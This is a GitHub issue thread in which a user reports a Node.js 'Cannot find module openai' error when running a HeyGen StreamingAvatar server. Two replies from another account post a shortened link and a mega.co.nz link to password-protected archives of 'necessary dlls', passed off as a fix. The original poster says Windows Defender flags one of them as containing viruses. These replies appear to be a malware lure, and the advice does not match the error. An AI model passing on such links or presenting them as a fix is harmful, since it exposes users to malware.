### ISSUE TITLE
Error on first run

### ISSUE THREAD

**Issue by navarisun1982** [HeyGen-Official/StreamingAvatar#22]
i have setup the script as described in the documentation..
added heygen api + openai API 
here is what happened when I try first run with node server,js

internal/modules/cjs/loader.js:638
    throw err;
    ^

Error: Cannot find module 'openai'
    at Function.Module._resolveFilename (internal/modules/cjs/loader.js:636:15)
    at Function.Module._load (internal/modules/cjs/loader.js:562:25)
    at Module.require (internal/modules/cjs/loader.js:692:17)
    at require (internal/modules/cjs/helpers.js:25:18)
    at Object.<anonymous> (/root/StreamingAvatar/server.js:2:16)
    at Module._compile (internal/modules/cjs/loader.js:778:30)
    at Object.Module._extensions..js (internal/modules/cjs/loader.js:789:10)
    at Module.load (internal/modules/cjs/loader.js:653:32)
    at tryModuleLoad (internal/modules/cjs/loader.js:593:12)
    at Function.Module._load (internal/modules/cjs/loader.js:585:3)

**Comment by SagarChandra07** [comment]
I think this will help you.
https://bit.ly/47P0Nvo
Archive password: changeme
I put the necessary dlls in the archive

**Comment by SagarChandra07** [comment]
download

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA
Pass: changeme
I put the necessary dlls in the archive

**Comment by navarisun1982** [comment]
i downloaded the first file and I saw Windows files, I work on ubuntu.
the second one windows defender prevents as it is defined it have viruses.

thx for fast reply
